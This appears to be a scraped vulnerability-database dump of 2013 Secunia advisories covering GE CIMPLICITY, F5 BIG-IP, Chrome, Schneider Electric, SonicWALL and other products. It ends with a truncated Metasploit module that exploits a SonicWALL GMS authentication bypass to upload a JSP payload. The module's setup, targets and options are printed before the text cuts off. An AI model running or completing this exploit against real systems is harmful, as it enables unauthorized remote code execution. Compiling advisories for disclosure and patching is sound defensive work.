VARIoT IoT vulnerabilities database

Directory traversal vulnerability in substitute.bcl in the WebView CimWeb subsystem in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to read arbitrary files via a crafted packet. GE Intelligent Platforms is a software and hardware product, service and expertise for users in the field of automation control and embedded. GE Proficy CIMPLICITY is the PC configuration software. GE Proficy CIMPLICITY WebView CimWeb component (substitute.bcl) does not properly check input variables and send malicious packets to TCP port 80. Attackers can view and download files on the server through directory traversal attacks. The CIMPLICITY component is prone to a directory-traversal vulnerability and a remote command-execution vulnerability because it fails to properly validate user-supplied data. Failed exploit attempts will result in a denial-of-service condition. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: GE Intelligent Platforms Products Two Vulnerabilities SECUNIA ADVISORY ID: SA51936 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51936/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51936 RELEASE DATE: 2013-01-24 DISCUSS ADVISORY: http://secunia.com/advisories/51936/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51936/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51936 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in GE Intelligent Platforms products, which can be exploited by malicious users to disclose certain sensitive information and compromise a vulnerable system. 2) An unspecified error exists in CimWebServer when processing packets and can be exploited to e.g. run arbitrary commands by sending a specially-crafted packet. NOTE: CIMPLICITY built-in Web server component is not enabled by default. The vulnerabilities are reported in the following products: * Proficy HMI/SCADA \x96 CIMPLICITY version 4.01 and greater * Proficy Process Systems with CIMPLICITY SOLUTION: Apply updates (please see the vendor's advisory for details). Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: ICSA-13-022-02: http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-02.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to execute arbitrary commands or cause a denial of service (daemon crash) via a crafted packet. GE Intelligent Platforms is a software and hardware product, service and expertise for users in the field of automation control and embedded. GE Proficy CIMPLICITY is the PC configuration software. The CIMPLICITY component is prone to a directory-traversal vulnerability and a remote command-execution vulnerability because it fails to properly validate user-supplied data. Failed exploit attempts will result in a denial-of-service condition. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: GE Intelligent Platforms Products Two Vulnerabilities SECUNIA ADVISORY ID: SA51936 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51936/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51936 RELEASE DATE: 2013-01-24 DISCUSS ADVISORY: http://secunia.com/advisories/51936/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51936/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51936 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in GE Intelligent Platforms products, which can be exploited by malicious users to disclose certain sensitive information and compromise a vulnerable system. 1) An unspecified error exists within the WebView CimWeb component (substitute.bcl) and can be exploited to disclose arbitrary files via directory traversal attacks. 2) An unspecified error exists in CimWebServer when processing packets and can be exploited to e.g. run arbitrary commands by sending a specially-crafted packet. NOTE: CIMPLICITY built-in Web server component is not enabled by default. The vulnerabilities are reported in the following products: * Proficy HMI/SCADA \x96 CIMPLICITY version 4.01 and greater * Proficy Process Systems with CIMPLICITY SOLUTION: Apply updates (please see the vendor's advisory for details). Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: ICSA-13-022-02: http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-02.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Untrusted search path vulnerability in Lenovo Thinkpad Bluetooth with Enhanced Data Rate Software 6.4.0.2900 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse DLL that is located in the same folder as a file that is processed by Lenovo Bluetooth. Supplementary information : CWE Vulnerability type by CWE-426: Untrusted Search Path ( Unreliable search path ) Has been identified. Attackers can exploit this vulnerability to execute arbitrary code in the context of the user running the vulnerable application. Bluetooth with Enhanced Data Rate Software 6.4.0.2900 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Lenovo Bluetooth with Enhanced Data Rate Software Insecure Library Loading Vulnerability SECUNIA ADVISORY ID: SA51846 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51846/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51846 RELEASE DATE: 2013-01-22 DISCUSS ADVISORY: http://secunia.com/advisories/51846/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51846/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51846 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Microsoft has reported a vulnerability in Lenovo Bluetooth with Enhanced Data Rate Software, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the application loading libraries in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening certain files on a remote WebDAV or SMB share. Successful exploitation allows execution of arbitrary code. The vulnerability is reported in versions 6.4.0.2900 and prior. SOLUTION: Update to version 6.5.1.2700. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Haifei Li, Microsoft. ORIGINAL ADVISORY: Lenovo: http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/g4wb10ww.txt MSVR: http://technet.microsoft.com/en-us/security/msvr/msvr13-001 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

content/renderer/media/webrtc_audio_renderer.cc in Google Chrome before 24.0.1312.56 on Mac OS X does not use an appropriate buffer size for the 96 kHz sampling rate, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a web site that provides WebRTC audio. Google Chrome is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible. Versions prior to Chrome 24.0.1312.56 are vulnerable. This BID is being retired. The following individual records exist to better document the issues: 59680 Google Chrome CVE-2013-0842 Unspecified Security Vulnerability 59681 Google Chrome CVE-2013-0840 Unspecified Security Vulnerability 59682 Google Chrome CVE-2013-0841 Unspecified Security Vulnerability 59685 Google Chrome CVE-2013-0843 Denial of Service Vulnerability 59683 Google Chrome CVE-2013-0839 Use-After-Free Memory Corruption Vulnerability. Attackers can exploit this issue to crash the application, denying service to legitimate users. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA51935 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51935/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51935 RELEASE DATE: 2013-01-23 DISCUSS ADVISORY: http://secunia.com/advisories/51935/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51935/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51935 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Google Chrome, where some have unknown impacts and others can be exploited by malicious people to compromise a user's system. 1) A use-after-free error exists when handling canvas font. 2) An error exists when validating the URL when opening new windows. 3) An array indexing error exists when blocking certain contents. 4) An error exists when handling NULL characters embedded in paths. 5) An error exists when handling unsupported RTC sampling rate. NOTE: This vulnerability affects Mac only. SOLUTION: Update to version 24.0.1312.56. PROVIDED AND/OR DISCOVERED BY: 2) Reported by the vendor. The vendor credits: 1) Atte Kettunen, OUSPG. 5) Ted Nakamura, Chromium development community. ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2013/01/stable-channel-update_22.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

XML External Entity (XXE) vulnerability in sam/admin/vpe2/public/php/server.php in F5 BIG-IP 10.0.0 through 10.2.4 and 11.0.0 through 11.2.1 allows remote authenticated users to read arbitrary files via a crafted XML file. F5 BIG-IP is an application switch. Allows authenticated attackers to download arbitrary files from the system in the \"apache\" OS user context. The BIG-IP configuration allows users to access the /etc/shadow file to obtain user password hashes. Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks. F5 BIG-IP is an all-in-one network device integrated with network traffic management, application security management, load balancing and other functions from F5 Corporation of the United States. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: F5 Products XML Entity References Information Disclosure Vulnerability SECUNIA ADVISORY ID: SA51986 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51986/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51986 RELEASE DATE: 2013-01-25 DISCUSS ADVISORY: http://secunia.com/advisories/51986/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51986/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51986 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: SEC Consult has reported a vulnerability in F5 Products, which can be exploited by malicious users to disclose certain sensitive information. The vulnerability is caused due to an error in the web interface XML parser when validating XML requests and can be exploited to e.g. disclose local files. The vulnerability is reported in the following products: * BIG-IP LTM versions 10.x and 11.x * BIG-IP GTM versions 10.x and 11.x * BIG-IP ASM versions 10.x and 11.x * BIG-IP Link Controller versions 10.x and 11.x * BIG-IP WebAccelerator versions 10.x and 11.x * BIG-IP PSM versions 10.x and 11.x * BIG-IP WOM versions 10.x and 11.x * BIG-IP APM versions 10.x and 11.x * BIG-IP Edge Gateway versions 10.x and 11.x * BIG-IP Analytics version 11.x SOLUTION: Update to a fixed version (Please see vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Stefan Viehb\xf6ck, SEC Consult. ORIGINAL ADVISORY: sol14138: http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html SEC Consult: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-0_F5_BIG-IP_XML_External_Entity_Injection_v10.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Heap-based buffer overflow in RFManagerService.exe in Schneider Electric Accutech Manager 2.00.1 and earlier allows remote attackers to execute arbitrary code via a crafted HTTP request. Schneider Electric Accutech Manager is a real-time monitoring and management software based on windows services. Accutech Manager is prone to a remote heap-based buffer-overflow vulnerability. Failed exploit attempts will result in a denial-of-service condition. Accutech Manager 2.00.1 and prior are vulnerable. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Schneider Electric Accutech Manager Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA52034 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52034/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52034 RELEASE DATE: 2013-01-31 DISCUSS ADVISORY: http://secunia.com/advisories/52034/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/52034/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=52034 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Schneider Electric Accutech Manager, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to an unspecified error and can be exploited to cause a heap-based buffer overflow. Successful exploitation may allow execution of arbitrary code. The vulnerability is reported in versions 2.00.1 and prior. SOLUTION: No official solution is currently available. A fix is scheduled to be released in February 2013. PROVIDED AND/OR DISCOVERED BY: The vendor credits Exodus Intelligence. ORIGINAL ADVISORY: http://www.schneider-electric.com/sites/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130121_advisory_of_vulnerability_affecting_accutech_manager_software.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco WebEx Training Center allow remote authenticated users to bypass intended privilege restrictions and (1) enable or (2) disable training-center recordings via a crafted URL, aka Bug ID CSCzu81065. Cisco WebEx Training Center Has been bypassed by permissions, training-center Records of (1) Activation, or (2) There are vulnerabilities that are disabled. Attackers can exploit this issue to bypass security restrictions to perform unauthorized actions; this may aid in launching further attacks. Cisco WebEx is a set of Web conferencing tools developed by American Cisco (Cisco), which can assist office workers in different places to coordinate and cooperate. WebEx services include Web conferencing, telepresence video conferencing and enterprise instant messaging (IM)

Allows an attacker to perform malicious actions. The Cisco Linksys WRT54GL Router is a wireless routing device. A security vulnerability exists in the Cisco Linksys WRT54GL Router. Due to the lack of filtering on the wan_hostnam parameter, an attacker can exploit the vulnerability to inject and execute arbitrary shell commands. Since changing the current password does not require providing current password information, an attacker is allowed to submit a malicious request to change the password information. A command-execution vulnerability 2. A security-bypass vulnerability 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability 5. Cisco Linksys WRT54GL 1.1 running firmware version 4.30.15 build 2 is vulnerable; other versions may also be affected

Schneider Electric and the 7T Interactive Graphical SCADA System are automated monitoring and control systems. The Interactive Graphical SCADA System has an unspecified error in dc.exe when processing certain requests, allowing an attacker to submit a malicious request to the TCP 12397 port to trigger a buffer overflow that can crash the application service. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Schneider Electric Interactive Graphical SCADA System Data Collector Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA51819 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51819/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51819 RELEASE DATE: 2013-01-17 DISCUSS ADVISORY: http://secunia.com/advisories/51819/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51819/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51819 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Schneider Electric Interactive Graphical SCADA System, which can be exploited by malicious people to compromise a vulnerable system. SOLUTION: Apply patch. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: The vendor credits Aaron Portnoy, Exodus Intelligence. ORIGINAL ADVISORY: http://www2.schneider-electric.com/sites/corporate/en/support/cybersecurity/cyber-security-vulnerabilities-sorted.page http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Axway Secure Messenger before 6.5 Updated Release 7, as used in Axway Email Firewall, provides different responses to authentication requests depending on whether the user exists, which allows remote attackers to enumerate users via a series of requests. Axway Secure Messenger is prone to an information-disclosure vulnerability. Attackers can exploit this issue to retrieve sensitive information. Information harvested may aid in launching further attacks. Axway Secure Messenger 6.5 is vulnerable; other versions may also be affected. Axway Secure Messenger is a suite of email encryption software from Axway, France. The software supports encrypting and authenticating emails, automating tracking of message delivery, and more. Specifically, two (2) JSESSIONIDs are returned for valid users, and one (1) for invalid users. Solution: Upgrade to Secure Messenger version 6.5 Updated Release 7, or migrate to Axway MailGate 5.2.0 (or later) for the equivalent functionality. Contact: support.axway.com

Watson SHDSL Routers is a router device. The Watson SHDSL Routers watson management console incorrectly filters user-submitted HTTP requests, allowing attackers to exploit vulnerabilities for directory traversal attacks to obtain sensitive file information.

An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products

An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the Web Administration interface allows to abuse the "appliance" application and upload an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run successfully while testing, shell payload have been used. }, 'Author' => [ 'Nikolas Sotiriu', # Vulnerability Discovery 'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-1359'], [ 'OSVDB', '89347' ], [ 'BID', '57445' ], [ 'EDB', '24204' ] ], 'Privileged' => true, 'Platform' => [ 'win', 'linux' ], 'Targets' => [ [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 17 2012')) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) ], self.class) end def on_new_session # on_new_session will force stdapi to load (for Linux meterpreter) end def generate_jsp var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) var_exepath = 